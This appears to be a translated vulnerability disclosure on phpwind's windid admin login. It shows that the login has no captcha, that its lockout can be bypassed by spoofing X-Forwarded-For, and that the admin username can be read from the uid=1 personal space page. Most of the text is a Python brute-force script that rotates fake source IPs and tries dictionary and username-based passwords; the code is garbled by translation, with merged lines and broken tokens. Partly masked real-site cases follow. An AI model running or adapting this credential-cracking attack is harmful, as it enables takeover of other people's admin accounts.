Phpwind background account password can be cracked and verification code can be ignored

Phpwind background account password can be cracked and verification code can be ignored

 

Let's take a look at the official website.

Http://www.phpwind.net/admin.php
 

Verification code available



Then let's take a look.

Http://www.phpwind.net/windid/admin.php
 

The verification code is missing.







Then I set up phpwind on the Virtual Machine (the verification code is disabled by default ,)
 

 

Http: // 192.168.1.117/windid/admin. php

No verification code

Then, log on to the account and password at this URL.

After successful login, open http: // 192.168.1.117/admin. php

It is also the logon status.



But if it is cracked normally, an error will be prompted eight times.
 

However, the test finds that X-Forwarded-For is used to determine the source ip address.

In this way, you can modify xff to crack it.



To crack the password, you must know his account,

There are many ways to obtain the administrator account. Here is a simple method.

We can get it in the personal space. (This method will not work if this id is deleted .)

Http: // 192.168.1.117/index. php? M = space & uid = 1
 

 

 

The brute-force cracking program code is as follows:
 

<Poc> # coding: utf-8import httplib, re, random, urllib, timefrom sys import argv # crack def getHtml (host, username, password): ip = str (random. randint (1,100) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv: 33.0) gecko/20100101 Firefox/33.0 "," X-Forwarded-For ": ip, 'content-type': 'applicat Ion/x-www-form-urlencoded ', 'accept': 'text/html, application/xhtml + xml, application/xml; q = 0.9 ,*/*; q = 0.8 ', 'connection': 'Keep-alive', 'cookies ': 'csrf _ token = wooyun '} postContent = 'username =' + username + '& password =' + password + '& submit = & csrf_token = wooyun' resultHtml = httplib. HTTPConnection (host, 80, False) resultHtml. request ('post', '/windid/admin. php? A = login', body = postContent, headers = postHead) page = resultHtml. getresponse () pageConect = page. read () return pageConect # Get formhash and seccodehiddendef getusername (host): url = 'HTTP: // '+ host +'/index. php? M = space & uid = 1' pageContent = urllib. urlopen (url ). read () r1 = re. compile ('"> (\ S {1, 30}) personal space </a>') username = r1.findall (pageContent) [0] return username # obtain the host dictionary interval through argv for blasting if (len (argv) = 1 ): print '----> python' + argv [0] + 'host address dictionary file interval 'print' ----> python' + argv [0] + '192.168.1.105 pass.txt 0.2' else: host = argv [1] passfile = argv [2] sleeptime = argv [3] print 'website host is '+ hostprint'. The password dictionary is '+ passfileprint'. The interval is '+ sleeptimeprint. '---> 'username = getusername (host) f = open (passfile, 'R') htmlpass = f. read (). split ('\ r \ n') f. close () userpass = [username + '000000', username + '000000', username + username, username + '.. ', username + '. ', username + 'admin888', username + 'admin123', username + 'admin', username + '000000'] htmlpass = userpass + htmlpassfor I in range (len (htmlpass )): time. sleep (float (sleeptime) print 'attempt password' + htmlpass [I] if (getHtml (host, username, htmlpass [I]) = ''): print 'account is '+ usernameprint' password is '+ htmlpass [I] break </poc>

Demo
 

 

The following are several cases

***** admin  **********  admin  **********cn  adm**********n.com ad**********  admin *****

 

 

 

 

Solution:

Enhanced verification